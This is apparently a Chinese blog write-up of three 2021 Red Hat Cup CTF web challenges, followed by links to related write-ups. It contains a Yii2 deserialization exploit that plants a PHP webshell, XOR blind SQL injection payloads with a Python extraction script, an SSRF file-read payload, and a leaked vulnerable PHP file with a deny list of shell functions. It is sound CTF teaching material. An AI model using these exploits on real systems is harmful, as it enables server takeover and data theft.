[2021红帽杯]Web writeup

最新推荐文章于 2022-04-24 10:44:39 发布
最新推荐文章于 2022-04-24 10:44:39 发布
阅读量1.7k 收藏 2
点赞数 5
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Anton__1/article/details/116605351
版权

find_it

老套路扫一下目录

貌似只有君子协定有用,打开看看

When I was a child,I also like to read Robots.txt

Here is what you want:1ndexx.php

打开1ndexx.php 发现打不开,

尝试一下是否有备份

/.1ndexx.php.swp

发现了一串代码:

<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

构造payload:

/?code=<?php%20phpinfo();?>

然后访问一下hack.php查看phpinfo

本来只是想指向探针看一下,没想到flag直接给了

framework

打开发现是yii2反序列化

随即打开百度,来找一下复现:

https://mp.weixin.qq.com/s?__biz=MzU5MDI0ODI5MQ==&mid=2247485129&idx=1&sn=b27e3fe845daee2fb13bb9f36f53ab40

然后回到题目,按照常理我扫了一下网站目录,发现了www.zip" :

下载到本地发现正好是源码,就在本地搭建环境

丢进去phpstudy里,按照大佬的漏洞复现,在controllers下创建Controller.php

然后再新建个poc.php

在里面写:

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("/var/www/html/web/1.php","<?php eval(\$_POST[111]);");';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

然后再生成一下payload

传进去:

/index.php?r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjczOiJmaWxlX3B1dF9jb250ZW50cygiL3Zhci93d3cvaHRtbC93ZWIvMS5waHAiLCI8P3BocCBldmFsKFwkX1BPU1RbMTExXSk7Iik7Ijt9aToxO3M6MzoicnVuIjt9fX19

一开始,传进去看到这个报错,以为没有成功,后来访问了一下1.php发现自己成功了QAQ

打开蚁剑,直接连上马:

看了一圈发现flag再根目录:

然后发现没有权限。。。。。。。又卡住了

但是我做题晚上刚刚复现了蓝帽的web题,有disable_functions绕过插件,就去试了一下

然后试着读了一下

它就出来了!!!!!!!

#WebsiteManger

是一道注入题

跑了一下sqlmap

发现了两个参数:

username password

/image.php下的id

注入了一下发现前两个都不是,随即对id下手

尝试了几种注入都无效,最后发现是异或注入

构造payload:

/image.php?id=1^(ascii(substr((select(database())),1,1))>1)^1

有回现,尝试变更参数

直到:

/image.php?id=1^(ascii(substr((select(database())),1,1))>99)^1

时没有回显,证明数据库第一位是c

获取第二位:

/image.php?id=1^(ascii(substr((select(database())),2,1))>1)^1

发现到117没有回显

证明第二位为t

依次类推,获得第三位为f

当数据库位数为4位时始终没有回显。证明只有三位,且数据库名为ctf

知道了数据库名就好办了,直接起脚本,依次爆):

import requests
import time
url = "http://eci-2zefme7yqvztqdsonszy.cloudeci1.ichunqiu.com/image.php?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{0},1))>{1})^1" 
word=""
for i in range(1,1000):
    l = 32
    h = 128
    mid = (l + h)
    while (l < h):
        nurl=url.format(i,mid)
        r=requests.get(url=nurl)
        if 'JFIF' in r.text:
            l = mid + 1
        else:
            h = mid
        mid = (l + h) // 2
        time.sleep(0.1)
    word += chr(mid)
    print(word)
print(word)

获得表名为 users

之后依次修改url 继续 爆破

最终爆破出来密码为(当前环境下的密码):

然后登录管理员账号:

抓包查看发现是ssrf 读取文件漏洞

构造payload:

file:// /flag

获得flag

H3h3QAQ
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 21
    评论
专栏目录
[2021东华杯]Web Writeup1
08-03
Java 反序列化漏洞及利用 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,发生在 Java 对象的序列化和反序列化过程中。该漏洞可以导致攻击者执行恶意代码,盗取敏感信息,或者控制服务器。 ...
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
红帽杯2021_web_部分
ScyLamb的博客
05-10 1264
find_it 首页没发现东西,尝试robots.txt 发现 1ndexx.php 但无法访问 1ndexx.php 尝试继续找信息泄露,最后找到 .1ndexx.php.swp <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-co
2021红帽WebsiteManger
LYJ20010728的博客
06-22 739
2021红帽WebsiteManger考点思路Payload 考点 布尔盲注、SSRF 思路 尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上 当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点 猜测 flag在根目录下:file:///flag Payload 盲注脚本 impo
2021红帽web部分复现
1ance's blog
05-18 403
目录Webfind_itframeworkWebsiteMangerMisc签到 Web find_it 根据题目信息查看robots.txt,发现1ndexx.php 打开也没有啥,于是扫扫目录,发现hack.php 但是好像也没有东西。 继续分析,找找有没有备份文件。 芜湖~发现有.1ndexx.php.swp 拿到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <t
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9951
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
2021第四届红帽杯网络安全大赛-线上赛Writeup
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
2019美亚杯writeup
03-26
本资源摘要信息来自2019美亚杯writeup,内容涉及电子数据取证大赛的相关检材和试题等。电子数据取证大赛是一项测试电子数据取证和分析能力的比赛,参赛者需要对提供的镜像文件进行分析,回答相关问题。 本资源摘要...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
wp篇 find_it复现
这周末在做梦的博客
05-18 354
wp篇简述了博主复现CTF以及记录wp的过程一,复现1复现文件概述2复现过程概述二,wirteup1探测2解题3playload 一,复现 1复现文件概述 需要源码的请评论私聊。下面就简单展示一下,复现成功后的文件目录。 2复现过程概述 直接粘贴源码,如果利用vim断网生成.swp文件再服务器中无法长久存在,故直接touch .1ndexx.php.swp。后编辑修改。 为了解决出现的网站编码的问题,再在网页伪静态中加入将.swp解析为php的规则,将本题目做了微调。 二,wirteup 1探测 首先发现如
CTFHUB find_it
qq_46266956的博客
04-24 3459
CTFHUB find_it dirsearch扫描 robots.txt When I was a child,I also like to read Robots.txt Here is what you want: 1ndexx.php 1ndexx.php无法访问; 扫缓存.1ndexx.php.swp [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzCdf50K-1650768257307)(C:\Users\27969\AppData\Roaming\Ty
PHP安装所最到的问题-解决方案
热门推荐
hp6451449的博客
01-26 1万+
PHP安装所最到的问题-解决方案 Although Drupals 7+ run smoothly on PHP 5.3, Drupal 6 still feels much better with PHP 5.2. Even though D6 core is compatible with PHP 5.3 for quite some time now, a lot of contr
红帽杯find_it
qq_53755216的博客
06-24 256
<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-color: white; text-align: cent
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4828
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
PHP面试题(English)
weixin_34004576的博客
01-08 174
1. What is the difference between == and === in PHP? The == operator just checks to see if the left and right values are equal. But, the === operator (note the extra “=”) actually checks to see if th...
绿城杯2021 Crypto writeups
weixin_56678592的博客
09-29 494
绿城杯2021 Crypto writeups #1 warmup: 题目: from Crypto.Util.number import * from flag import flag assert flag[:5]=='flag{' str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(plain_text, a, b, m): cipher_text = '' for i in plain_tex
2021年 CISCN writeup
读万卷书,行万里路。
05-16 945
2021年 CISCN writeup 1.1 easy_sql 进行手动测试,发现可以进行报错注入。Payload 为: ') AND updatexml(1, concat(0x7e, (database()), 0x7e), 1)-- 尝试读取数据库表的表名,发现information关键字被过滤,猜了一下表名为 fl4g、flag,最后确定表名为 flag。 使用 join 爆出字段名。 select*from (select * from flag as a join flag b)c sele

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值